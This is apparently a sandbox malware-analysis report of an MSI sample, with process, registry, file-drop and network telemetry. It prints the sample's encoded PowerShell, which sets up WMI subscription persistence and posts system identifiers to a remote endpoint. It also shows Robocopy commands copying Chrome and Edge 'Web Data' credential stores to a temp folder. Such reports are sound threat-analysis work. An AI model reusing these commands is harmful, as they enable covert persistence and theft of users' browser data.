UAQQBSAEEAQQBpAEEAQwB3AEEASQBBAEEAaQBBAEQAQQBBAEkAZwBBAHMAQQBDAEEAQQBJAGcAQgBzAEEARwBFAEEAZABBAEIAbABBAEgATQBBAGQAQQBBAGkAQQBGADAAQQBmAFEAQQBuAEEAQwBrAEEATABnAEIAeQBBAEcAVQBBAGMAdwBCADEAQQBHAHcAQQBkAEEAQQB1AEEARgBNAEEAZABRAEIAaQBBAEgATQBBAGQAQQBCAHkAQQBHAGsAQQBiAGcAQgBuAEEAQwBnAEEATQBnAEEAcwBBAEMAQQBBAE4AZwBBAHkAQQBDAGsAQQBJAEEAQQB0AEEASABNAEEAYwBBAEIAcwBBAEcAawBBAGQAQQBBAGcAQQBDAGMAQQBLAEEAQQB1AEEASABzAEEATQBnAEIAOQBBAEMAawBBAEoAdwBBAGcAQQBDADAAQQBiAGcAQgBsAEEAQwBBAEEASgB3AEEAbgBBAEMAQQBBAEwAUQBCAHUAQQBHAFUAQQBJAEEAQQBuAEEARABBAEEATQBBAEEAbgBBAEMAQQBBAGYAQQBBAGcAQQBFAFkAQQBiAHcAQgB5AEEARQBVAEEAWQBRAEIAagBBAEcAZwBBAEwAUQBCAFAAQQBHAEkAQQBhAGcAQgBsAEEARwBNAEEAZABBAEEAZwBBAEgAcwBBAEkAQQBCAGIAQQBFAE0AQQBiAHcAQgB1AEEASABZAEEAWgBRAEIAeQBBAEgAUQBBAFgAUQBBADYAQQBEAG8AQQBWAEEAQgB2AEEARQBJAEEAZQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBGADgAQQBMAEEAQQBnAEEARABFAEEATgBnAEEAcABBAEMAQQBBAGYAUQBBAHAAQQBDAGsAQQBLAFEAQQB2AEEARwBFAEEAZABRAEIAMABBAEcAZwBBAEkAZwBBAGcAQQBDAEEAQQBMAFEAQgBOAEEARwBVAEEAZABBAEIAbwBBAEcAOABBAFoAQQBBAGcAQQBGAEEAQQBUAHcAQgBUAEEARgBRAEEASQBBAEEAdABBAEUASQBBAGIAdwBCAGsAQQBIAGsAQQBJAEEAQQBvAEEAQwBJAEEAZQB3AEEAaQBBAEMASQBBAGMAdwBCAGwAQQBIAEkAQQBhAFEAQgBoAEEARwB3AEEASQBnAEEAaQBBAEQAbwBBAEkAQQBBAGkAQQBDAEkAQQBKAEEAQQBvAEEAQwBnAEEAUgB3AEIAbABBAEgAUQBBAEwAUQBCAEQAQQBHAGsAQQBiAFEAQgBKAEEARwA0AEEAYwB3AEIAMABBAEcARQBBAGIAZwBCAGoAQQBHAFUAQQBJAEEAQQB0AEEARQBNAEEAYgBBAEIAaABBAEgATQBBAGMAdwBBAGcAQQBGAGMAQQBhAFEAQgB1AEEARABNAEEATQBnAEIAZgBBAEUAOABBAGMAQQBCAGwAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGUAUQBCAHoAQQBIAFEAQQBaAFEAQgB0AEEAQwBrAEEATABnAEIAVABBAEcAVQBBAGMAZwBCAHAAQQBHAEUAQQBiAEEAQgBPAEEASABVAEEAYgBRAEIAaQBBAEcAVQBBAGMAZwBBAHAAQQBDAEkAQQBJAGcAQQBzAEEAQwBBAEEASQBnAEEAaQBBAEgAQQBBAFkAdwBCAHAAQQBHAFEAQQBJAGcAQQBpAEEARABvAEEASQBBAEEAaQBBAEMASQBBAE0AZwBBAHkAQQBEAFkAQQBNAHcAQgBoAEEASABJAEEAZABBAEEAaQBBAEMASQBBAGYAUQBBAGkAQQBDAGsAQQBJAEEAQQB0AEEARQBNAEEAYgB3AEIAdQBBAEgAUQBBAFoAUQBCAHUAQQBIAFEAQQBWAEEAQgA1AEEASABBAEEAWgBRAEEAZwBBAEMASQBBAFkAUQBCAHcAQQBIAEEAQQBiAEEAQgBwAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDADgAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEEAaQBBAEMAawBBACIACgB9AAoACgAkAGYAYgAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAC0AQwBsAGEAcwBzACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4ARgBpAGwAdABlAHIAIAAtAEwAaQBrAGUAIAAiACoAVQBwAGQAYQB0AGUAVAByAGkAZwBnAGUAcgAqACIAfQAKAGkAZgAoACQAZgBiACAALQBuAGUAIAAkAG4AdQBsAGwAKQAKAHsACgAJACQAZgBiACAAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQACgB9AAoACgBTAGUAdAAtAFcAbQBpAEkAbgBzAHQAYQBuAGMAZQAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAAiAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAiACAALQBDAGwAYQBzAHMAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBBAHIAZwB1AG0AZQBuAHQAcwAgAEAAewAKACAAIAAgACAARgBpAGwAdABlAHIAIAA9ACAAJABmAGkAbAB0AGUAcgA7AAoAIAAgACAAIABDAG8AbgBzAHUAbQBlAHIAIAA9ACAAJABjAG8AbgBzAHUAbQBlAHIACgB9AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
1952"C:\Windows\system32\Robocopy.exe" "C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default" C:\Windows\Temp "Web Data" /NFL /NDL /NJH /NJS /nc /ns /np /R:1 /W:1C:\Windows\System32\Robocopy.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Robocopy
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\robocopy.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
1976"C:\Windows\system32\Robocopy.exe" "C:\Users\Administrator\AppData\Local\Microsoft\Edge\User Data\Default" C:\Windows\Temp "Web Data" /NFL /NDL /NJH /NJS /nc /ns /np /R:1 /W:1C:\Windows\System32\Robocopy.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Robocopy
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\robocopy.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
Total events
77 095
Read events
76 873
Write events
205
Delete events
17

Modification events

(PID) Process:(1176) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore
Operation:writeName:SrCreateRp (Enter)
Value:
480000000000000002BA5E8277E2DB019804000044130000D50700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1176) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppGetSnapshots (Enter)
Value:
480000000000000002BA5E8277E2DB019804000044130000D20700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1176) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppCreate (Enter)
Value:
4800000000000000DD537B8277E2DB019804000044130000D00700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1176) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP
Operation:writeName:LastIndex
Value:
15
(PID) Process:(1176) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppGatherWriterMetadata (Enter)
Value:
48000000000000002066CC8277E2DB019804000044130000D30700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5848) VSSVC.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Operation:writeName:IDENTIFY (Enter)
Value:
480000000000000024B6CE8277E2DB01D81600000C080000E80300000100000001000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5848) VSSVC.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Operation:writeName:IDENTIFY (Enter)
Value:
480000000000000024B6CE8277E2DB01D816000008020000E80300000100000001000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5848) VSSVC.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Operation:writeName:IDENTIFY (Leave)
Value:
48000000000000009D19D18277E2DB01D816000008020000E80300000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5848) VSSVC.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
Operation:writeName:IDENTIFY (Leave)
Value:
48000000000000009D19D18277E2DB01D8160000400E0000E80300000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5848) VSSVC.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Operation:writeName:IDENTIFY (Leave)
Value:
4800000000000000E07CD38277E2DB01D81600000C080000E80300000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
2
Suspicious files
69
Text files
44
Unknown types
0

Dropped files

PID
Process
Filename
Type
1176msiexec.exeC:\System Volume Information\SPP\metadata-2
MD5:
SHA256:
1176msiexec.exeC:\Windows\Installer\13524a.msi
MD5:
SHA256:
4576msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\357F04AD41BCF5FE18FCB69F60C6680F_A3BC571CEDB19D334A71A78584F39433binary
MD5:BE4962329A2B3524F5CF2F96E5B7096B
SHA256:91135920338170B8DFE0019C160BAB4030D7EDCBC9E1CA5D3A1E2229FA859745
4576msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554Ebinary
MD5:9FCA128AFCE7BD5169530ADB9A7F35D7
SHA256:19D322D9678455F9F1582856119A0203B8376CAE0517B6FB07EB1C19D78E2042
4576msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9CB4373A4252DE8D2212929836304EC5_1AB74AA2E3A56E1B8AD8D3FEC287554Ebinary
MD5:D94D7A491366C425056AC911A1BC0369
SHA256:7A782CC1A8060B7540C80F3052814E502F3DC1F3B30BABFABF8FA57C681AEAA0
4576msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\357F04AD41BCF5FE18FCB69F60C6680F_A3BC571CEDB19D334A71A78584F39433binary
MD5:9C45AC08865030A074AF0820024D8B00
SHA256:98B102897382109AB0D8AC82AE3789CA9A0459BB258AB1AB6F3EE4066D1486E7
1176msiexec.exeC:\Windows\Temp\~DFF1C6A335576834B1.TMPbinary
MD5:7F6AB9F6ADEFEC7000986D0AAF0AE040
SHA256:6CE44C66CF295F7C91AC62DEFBEB6936711D7435EA86C8D3D86B08C620901728
1176msiexec.exeC:\Windows\Temp\~DFF582D135DEAC840D.TMPbinary
MD5:BF619EAC0CDF3F68D496EA9344137E8B
SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
1176msiexec.exeC:\System Volume Information\SPP\snapshot-2binary
MD5:39679285017BB4E2BBC0D1492ABB7AB2
SHA256:F05105D48A1FD573A1FC6214CFCB9C8B16109F4E2B9210A95FAA698CD6609FB3
1176msiexec.exeC:\Windows\Temp\~DF1BFB4DED81EA5741.TMPbinary
MD5:7F6AB9F6ADEFEC7000986D0AAF0AE040
SHA256:6CE44C66CF295F7C91AC62DEFBEB6936711D7435EA86C8D3D86B08C620901728
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
27
TCP/UDP connections
48
DNS requests
28
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2840
svchost.exe
GET
200
199.232.214.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?26e925dbe4b0b8f0
unknown
whitelisted
2840
svchost.exe
GET
304
199.232.214.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?1726d6d8b0d81d39
unknown
whitelisted
2840
svchost.exe
GET
200
199.232.214.172:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?6f06946a73e04111
unknown
whitelisted
4132
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4576
msiexec.exe
GET
200
151.101.194.133:80
http://ocsp.globalsign.com/codesigningrootr45/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQVFZP5vqhCrtRN5SWf40Rn6NM1IAQUHwC%2FRoAK%2FHg5t6W0Q9lWULvOljsCEHe9DgW3WQu2HUdhUx4%2Fde0%3D
unknown
whitelisted
4576
msiexec.exe
GET
200
151.101.194.133:80
http://ocsp.globalsign.com/gsgccr45evcodesignca2020/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQaCbVYh07WONuW4e63Ydlu4AlbDAQUJZ3Q%2FFkJhmPF7POxEztXHAOSNhECDEZj2CC%2BdF7NAXtz%2FA%3D%3D
unknown
whitelisted
1524
svchost.exe
GET
200
2.18.64.212:80
http://www.msftconnecttest.com/connecttest.txt
unknown
whitelisted
2840
svchost.exe
GET
200
23.50.131.200:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a4234451418ace9a
unknown
whitelisted
2840
svchost.exe
GET
304
23.50.131.200:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?ff92f6844caf5eb8
unknown
whitelisted
2916
firefox.exe
POST
200
2.17.190.73:80
http://ocsp.digicert.com/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4956
firefox.exe
34.120.208.123:443
incoming.telemetry.mozilla.org
GOOGLE-CLOUD-PLATFORM
US
whitelisted
4596
pingsender.exe
34.120.208.123:443
incoming.telemetry.mozilla.org
GOOGLE-CLOUD-PLATFORM
US
whitelisted
1524
svchost.exe
2.18.64.200:80
Administracion Nacional de Telecomunicaciones
UY
unknown
6424
rundll32.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6892
OfficeC2RClient.exe
52.109.76.240:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2860
svchost.exe
20.189.173.10:443
v10.events.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2840
svchost.exe
199.232.214.172:80
ctldl.windowsupdate.com
FASTLY
US
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4132
svchost.exe
40.126.32.134:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
incoming.telemetry.mozilla.org
  • 34.120.208.123
whitelisted
telemetry-incoming.r53-2.services.mozilla.com
  • 34.120.208.123
whitelisted
google.com
  • 142.250.184.206
whitelisted
v10.events.data.microsoft.com
  • 20.189.173.10
whitelisted
ctldl.windowsupdate.com
  • 199.232.214.172
  • 199.232.210.172
  • 23.50.131.200
  • 23.50.131.216
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
login.live.com
  • 40.126.32.134
  • 20.190.160.132
  • 20.190.160.22
  • 20.190.160.131
  • 20.190.160.20
  • 20.190.160.4
  • 20.190.160.17
  • 20.190.160.65
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
ocsp.globalsign.com
  • 151.101.194.133
  • 151.101.130.133
  • 151.101.2.133
  • 151.101.66.133
whitelisted
ecs.office.com
  • 52.123.129.14
  • 52.123.128.14
whitelisted

Threats

PID
Process
Class
Message
1524
svchost.exe
Misc activity
ET INFO Microsoft Connection Test
Process
Message
TiWorker.exe
Populating UpdatePolicy AllowList
TiWorker.exe
TiWorker.exe
All policies are allowed
TiWorker.exe
SKU MDM licensing allow list string from SLAPI:
TiWorker.exe
AboveLock|Accounts|ActiveXControls|ADMXIngest|AllowMessageSync|AppHVSI|ApplicationDefaults|AllowAllTrustedApps|AllowAppStoreAutoUpdate|AllowAutomaticAppArchiving|AllowDeveloperUnlock|AllowGameDVR|AllowSharedUserAppData|ApplicationRestrictions|Audit|ConfigureChatIcon|LaunchAppAfterLogOn|MSIAllowUserControlOverInstall|MSIAlwaysInstallWithElevatedPrivileges|RestrictAppDataToSystemVolume|RestrictAppToSystemVolume|AppRuntime|AttachmentManager|Authentication|Autoplay|BitLocker|BITS|Bluetooth|Browser|Camera|Cellular|Connectivity|ControlPolicyConflict|CredentialProviders|CredentialsDelegation|CredentialsUI|Cryptography|DataProtection|DataUsage|Defender|DeliveryOptimization|Desktop|ConfigureSystemGuardLaunch|EnableVirtualizationBasedSecurity|DeviceHealthMonitoring|DeviceInstallation|DeviceLock|Display|DmaGuard|ErrorReporting|Eap|Education|EnterpriseCloudPrint|EventLogService|AllowClipboardHistory|AllowCopyPaste|AllowCortana|AllowDeviceDiscovery|AllowManualMDMUnenrollment|AllowSaveAsOfOfficeFiles|AllowScreenCapture|AllowSharingOfOfficeFiles|AllowSIMErrorDialogPromptWhenNoSIM|AllowSyncMySettings|AllowTailoredExperiencesWithDiagnosticData|AllowTaskSwitcher|AllowThirdPartySuggestionsInWindowsSpotlight|AllowVoiceRecording|DoNotShowFeedbackNotifications|DoNotSyncBrowserSettings|AllowFindMyDevice|ExploitGuard|Feeds|FileExplorer|Games|Handwriting|HumanPresence|InternetExplorer|Kerberos|KioskBrowser|Knobs|LanmanWorkstation|Licensing|LocalPoliciesSecurityOptions|LocalUsersAndGroups|Lockdown|Maps|MemoryDump|MSSecurityGuide|MSSLegacy|Multitasking|NetworkIsolation|NetworkListManager|NewsAndInterests|Notifications|OneDrive|Power|Printers|Privacy|RemoteAssistance|RemoteDesktopServices|RemoteDesktop|RemoteManagement|RemoteProcedureCall|RemoteShell|RestrictedGroups|Search|Security|Settings|SmartScreen|Speech|Start|Storage|System|SystemServices|TaskManager|TaskScheduler|TenantRestrictions|TextInput|TimeLanguageSettings|Troubleshooting|Update|UserRights|VirtualizationBasedTechnology|WiFi|WindowsLogon|WirelessDisplay|Location|WindowsAutopilot|WindowsConnectionManager|WindowsDefenderSecurityCenter|WindowsInkWorkspace|WindowsPowerShell|WindowsSandbox|WiredNetwork|ADMX_
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
2cee9b72969beb59dd8441a637fdc8275afe13dfb6356e24a1daa1f77c555639.bin